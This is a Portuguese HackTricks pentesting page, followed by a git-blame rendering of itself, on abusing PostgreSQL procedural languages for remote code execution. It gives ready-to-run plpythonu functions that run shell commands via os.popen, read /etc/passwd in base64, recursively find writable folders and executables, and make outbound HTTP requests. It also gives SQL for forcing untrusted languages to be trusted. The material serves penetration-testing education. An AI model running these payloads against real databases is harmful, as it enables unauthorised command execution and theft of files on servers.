hacktricks/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md

# RCE com Linguagens do PostgreSQL

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Linguagens do PostgreSQL

O banco de dados PostgreSQL ao qual você obteve acesso pode ter diferentes **linguagens de script instaladas** que você pode abusar para **executar código arbitrário**.

Você pode **fazê-las funcionar**:
```sql
\dL *

SELECT lanname,lanpltrusted,lanacl FROM pg_language;
```
A maioria das linguagens de script que você pode instalar no PostgreSQL tem **2 variantes**: a **confiável** e a **não confiável**. A **não confiável** terá um nome **terminado em "u"** e será a versão que permitirá que você **execute código** e use outras funções interessantes. Estas são linguagens que, se instaladas, são interessantes:

* **plpythonu**
* **plpython3u**
* **plperlu**
* **pljavaU**
* **plrubyu**
* ... (qualquer outra linguagem de programação usando uma versão insegura)

{% hint style="warning" %}
Se você descobrir que uma linguagem interessante está **instalada** mas **não confiável** pelo PostgreSQL (**`lanpltrusted`** é **`false`**), você pode tentar **confiá-la** com a seguinte linha para que nenhuma restrição seja aplicada pelo PostgreSQL:
```sql
UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language
SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';
```
{% endhint %}

{% hint style="danger" %}
Se não visualizar um idioma, você pode tentar carregá-lo com (**você precisa ser superadmin**):
```
CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u;
CREATE EXTENSION plperlu;
CREATE EXTENSION pljavaU;
CREATE EXTENSION plrubyu;
```
{% endhint %}

Note que é possível compilar as versões seguras como "inseguras". Verifique [**este**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) por exemplo. Portanto, sempre vale a pena tentar se você pode executar código mesmo que encontre instalado apenas o **confiável**.

## plpythonu/plpython3u

{% tabs %}
{% tab title="RCE" %}
```sql
CREATE OR REPLACE FUNCTION exec (cmd text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.popen(cmd).read()
#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
$$
LANGUAGE 'plpythonu';

SELECT cmd("ls"); #RCE with popen or execve
```
{% endtab %}

{% tab title="Obter usuário do SO" %}
```sql
CREATE OR REPLACE FUNCTION get_user (pkg text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.getlogin()
$$
LANGUAGE 'plpythonu';

SELECT get_user(""); #Get user, para is useless
```
{% endtab %}

{% tab title="Listar diretório" %}
```sql
CREATE OR REPLACE FUNCTION lsdir (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import json
from os import walk
files = next(walk(dir), (None, None, []))
return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
$$
LANGUAGE 'plpythonu';

SELECT lsdir("/"); #List dir
```
{% endtab %}

{% tab title="Encontrar pasta W" %}
```sql
CREATE OR REPLACE FUNCTION findw (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
writables = []
def find_writable(path):
if not os.path.isdir(path):
return
if os.access(path, os.W_OK):
writables.append(path)
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_writable(os.path.join(path, item))
find_writable(path)
return writables

return ", ".join(my_find(dir))
$$
LANGUAGE 'plpythonu';

SELECT findw("/"); #Find Writable folders from a folder (recursively)
```
{% endtab %}

{% tab title="Encontrar Arquivo" %}
```sql
CREATE OR REPLACE FUNCTION find_file (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in os.path.basename(i):
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_file("psql"); #Find a file
```
{% endtab %}

{% tab title="Encontrar executáveis" %}
```sql
CREATE OR REPLACE FUNCTION findx (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find(dir)
b = []

for i in a:
b.append(os.path.basename(i))
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT findx("/"); #Find an executables in folder (recursively)
```
{% endtab %}

{% tab title="Encontrar exec por subs" %}
```sql
CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in i:
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_exe("psql"); #Find executable by susbstring
```
{% endtab %}

{% tab title="Leitura" %}
```sql
CREATE OR REPLACE FUNCTION read (path text)
RETURNS VARCHAR(65535) stable
AS $$
import base64
encoded_string= base64.b64encode(open(path).read())
return encoded_string.decode('utf-8')
return open(path).read()
$$
LANGUAGE 'plpythonu';

select read('/etc/passwd'); #Read a file in b64
```
{% endtab %}

{% tab title="Obter permissões" %}
```sql
CREATE OR REPLACE FUNCTION get_perms (path text)
RETURNS VARCHAR(65535) stable
AS $$
import os
status = os.stat(path)
perms = oct(status.st_mode)[-3:]
return str(perms)
$$
LANGUAGE 'plpythonu';

select get_perms("/etc/passwd"); # Get perms of file
```
{% endtab %}

{% tab title="Pedido" %}
```sql
CREATE OR REPLACE FUNCTION req2 (url text)
RETURNS VARCHAR(65535) stable
AS $$
import urllib
r = urllib.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req2('https://google.com'); #Request using python2

CREATE OR REPLACE FUNCTION req3 (url text)
RETURNS VARCHAR(65535) stable
AS $$
from urllib import request
r = request.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req3('https://google.com'); #Request using python3
```
## pgSQL

Verifique a seguinte página:

{% content-ref url="pl-pgsql-password-bruteforce.md" %}
[pl-pgsql-password-bruteforce.md](pl-pgsql-password-bruteforce.md)
{% endcontent-ref %}

## C

Verifique a seguinte página:

{% content-ref url="rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](rce-with-postgresql-extensions.md)
{% endcontent-ref %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`# RCE com Linguagens do PostgreSQL`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* Você trabalha em uma empresa de cibersegurança? Gostaria de ver sua empresa anunciada no HackTricks? ou gostaria de ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:35:32 +00:00			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`* Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Linguagens do PostgreSQL`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`O banco de dados PostgreSQL ao qual você obteve acesso pode ter diferentes linguagens de script instaladas que você pode abusar para executar código arbitrário.`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode fazê-las funcionar:`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
GitBook: [#3693] No subject 2022-12-20 18:10:20 +00:00			`\dL *`
GitBook: [#3659] No subject 2022-11-08 23:28:51 +00:00
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`SELECT lanname,lanpltrusted,lanacl FROM pg_language;`
			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`A maioria das linguagens de script que você pode instalar no PostgreSQL tem 2 variantes: a confiável e a não confiável. A não confiável terá um nome terminado em "u" e será a versão que permitirá que você execute código e use outras funções interessantes. Estas são linguagens que, se instaladas, são interessantes:`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
			`* plpythonu`
GitBook: [#3646] No subject 2022-11-03 20:00:21 +00:00			`* plpython3u`
			`* plperlu`
			`* pljavaU`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`* plrubyu`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* ... (qualquer outra linguagem de programação usando uma versão insegura)`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
GitBook: [#3647] No subject 2022-11-03 20:03:24 +00:00			`{% hint style="warning" %}`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			Se você descobrir que uma linguagem interessante está instalada mas não confiável pelo PostgreSQL (`lanpltrusted` é `false`), você pode tentar confiá-la com a seguinte linha para que nenhuma restrição seja aplicada pelo PostgreSQL:
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
GitBook: [#3646] No subject 2022-11-03 20:00:21 +00:00			`UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';`
GitBook: [#3690] No subject 2022-12-20 15:51:45 +00:00			`# To check your permissions over the table pg_language`
			`SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```
GitBook: [#3647] No subject 2022-11-03 20:03:24 +00:00			`{% endhint %}`

GitBook: [#3693] No subject 2022-12-20 18:10:20 +00:00			`{% hint style="danger" %}`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`Se não visualizar um idioma, você pode tentar carregá-lo com (você precisa ser superadmin):`
GitBook: [#3693] No subject 2022-12-20 18:10:20 +00:00			```
			`CREATE EXTENSION plpythonu;`
			`CREATE EXTENSION plpython3u;`
			`CREATE EXTENSION plperlu;`
			`CREATE EXTENSION pljavaU;`
			`CREATE EXTENSION plrubyu;`
			```
			`{% endhint %}`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`Note que é possível compilar as versões seguras como "inseguras". Verifique [este](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) por exemplo. Portanto, sempre vale a pena tentar se você pode executar código mesmo que encontre instalado apenas o confiável.`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
GitBook: [#3646] No subject 2022-11-03 20:00:21 +00:00			`## plpythonu/plpython3u`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
			`{% tabs %}`
			`{% tab title="RCE" %}`
			```sql
			`CREATE OR REPLACE FUNCTION exec (cmd text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`return os.popen(cmd).read()`
			`#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT cmd("ls"); #RCE with popen or execve`
			```
			`{% endtab %}`

Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:35:32 +00:00			`{% tab title="Obter usuário do SO" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION get_user (pkg text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`return os.getlogin()`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT get_user(""); #Get user, para is useless`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Listar diretório" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION lsdir (dir text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import json`
			`from os import walk`
			`files = next(walk(dir), (None, None, []))`
			`return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT lsdir("/"); #List dir`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Encontrar pasta W" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION findw (dir text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`def my_find(path):`
			`writables = []`
			`def find_writable(path):`
			`if not os.path.isdir(path):`
			`return`
			`if os.access(path, os.W_OK):`
			`writables.append(path)`
			`if not os.listdir(path):`
			`return`
			`else:`
			`for item in os.listdir(path):`
			`find_writable(os.path.join(path, item))`
			`find_writable(path)`
			`return writables`

			`return ", ".join(my_find(dir))`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT findw("/"); #Find Writable folders from a folder (recursively)`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Encontrar Arquivo" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION find_file (exe_sea text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`def my_find(path):`
			`executables = []`
			`def find_executables(path):`
			`if not os.path.isdir(path):`
			`executables.append(path)`

			`if os.path.isdir(path):`
			`if not os.listdir(path):`
			`return`
			`else:`
			`for item in os.listdir(path):`
			`find_executables(os.path.join(path, item))`
			`find_executables(path)`
			`return executables`

			`a = my_find("/")`
			`b = []`

			`for i in a:`
			`if exe_sea in os.path.basename(i):`
			`b.append(i)`
			`return ", ".join(b)`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT find_file("psql"); #Find a file`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Encontrar executáveis" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION findx (dir text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`def my_find(path):`
			`executables = []`
			`def find_executables(path):`
			`if not os.path.isdir(path) and os.access(path, os.X_OK):`
			`executables.append(path)`

			`if os.path.isdir(path):`
			`if not os.listdir(path):`
			`return`
			`else:`
			`for item in os.listdir(path):`
			`find_executables(os.path.join(path, item))`
			`find_executables(path)`
			`return executables`

			`a = my_find(dir)`
			`b = []`

			`for i in a:`
			`b.append(os.path.basename(i))`
			`return ", ".join(b)`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT findx("/"); #Find an executables in folder (recursively)`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Encontrar exec por subs" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION find_exe (exe_sea text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`def my_find(path):`
			`executables = []`
			`def find_executables(path):`
			`if not os.path.isdir(path) and os.access(path, os.X_OK):`
			`executables.append(path)`

			`if os.path.isdir(path):`
			`if not os.listdir(path):`
			`return`
			`else:`
			`for item in os.listdir(path):`
			`find_executables(os.path.join(path, item))`
			`find_executables(path)`
			`return executables`

			`a = my_find("/")`
			`b = []`

			`for i in a:`
			`if exe_sea in i:`
			`b.append(i)`
			`return ", ".join(b)`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT find_exe("psql"); #Find executable by susbstring`
			```
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`{% endtab %}`
Translated to Portuguese 2023-06-06 18:56:34 +00:00
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`{% tab title="Leitura" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION read (path text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import base64`
			`encoded_string= base64.b64encode(open(path).read())`
			`return encoded_string.decode('utf-8')`
			`return open(path).read()`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`select read('/etc/passwd'); #Read a file in b64`
			```
			`{% endtab %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`{% tab title="Obter permissões" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION get_perms (path text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import os`
			`status = os.stat(path)`
			`perms = oct(status.st_mode)[-3:]`
			`return str(perms)`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`select get_perms("/etc/passwd"); # Get perms of file`
			```
			`{% endtab %}`

Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`{% tab title="Pedido" %}`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			```sql
			`CREATE OR REPLACE FUNCTION req2 (url text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`import urllib`
			`r = urllib.urlopen(url)`
			`return r.read()`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT req2('https://google.com'); #Request using python2`

			`CREATE OR REPLACE FUNCTION req3 (url text)`
			`RETURNS VARCHAR(65535) stable`
			`AS $$`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`from urllib import request`
			`r = request.urlopen(url)`
			`return r.read()`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`$$`
			`LANGUAGE 'plpythonu';`

			`SELECT req3('https://google.com'); #Request using python3`
			```
GitBook: [#3645] No subject 2022-11-03 19:12:25 +00:00			`## pgSQL`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Verifique a seguinte página:`
GitBook: [#3657] No subject 2022-11-08 21:47:24 +00:00
GitBook: [#3645] No subject 2022-11-03 19:12:25 +00:00			`{% content-ref url="pl-pgsql-password-bruteforce.md" %}`
			`[pl-pgsql-password-bruteforce.md](pl-pgsql-password-bruteforce.md)`
			`{% endcontent-ref %}`

GitBook: [#3657] No subject 2022-11-08 21:47:24 +00:00			`## C`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Verifique a seguinte página:`
GitBook: [#3657] No subject 2022-11-08 21:47:24 +00:00
			`{% content-ref url="rce-with-postgresql-extensions.md" %}`
			`[rce-with-postgresql-extensions.md](rce-with-postgresql-extensions.md)`
			`{% endcontent-ref %}`

GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:35:32 +00:00			`* Você trabalha em uma empresa de cibersegurança? Gostaria de ver sua empresa anunciada no HackTricks? ou gostaria de ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil 2024-02-08 04:35:32 +00:00			`* Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-me no Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['ctf-write-ups/challenge-0521.intigriti.io.md', 'ctf-write-u 2024-02-07 04:39:38 +00:00			`* Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3644] No subject 2022-11-03 18:57:14 +00:00
			`</details>`